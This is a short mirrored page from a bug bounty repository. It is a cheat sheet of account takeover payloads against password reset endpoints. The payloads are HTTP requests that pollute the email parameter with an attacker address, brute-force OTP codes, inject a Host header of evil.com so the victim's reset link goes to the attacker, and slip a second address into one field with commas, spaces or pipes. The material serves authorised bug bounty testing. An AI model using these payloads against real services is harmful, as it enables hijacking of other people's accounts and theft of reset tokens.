mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-19 02:46:12 +00:00
35198d15d7
Add 3 tips
766 B
766 B
Account Takeover
- Parameter pollution in reset password
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
- Bruteforce the OTP code
POST /reset
[...]
email=victim@mail.com&code=$123456$
- Host header Injection
POST /reset
Host: evil.com
[...]
email=victim@mail.com
And the victim will receive the reset link with evil.com
- Using separator in value of the parameter
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
- No domain in value of the paramter
POST /reset
[...]
email=victim
- No TLD in value of the paramter
POST /reset
[...]
email=victim@mail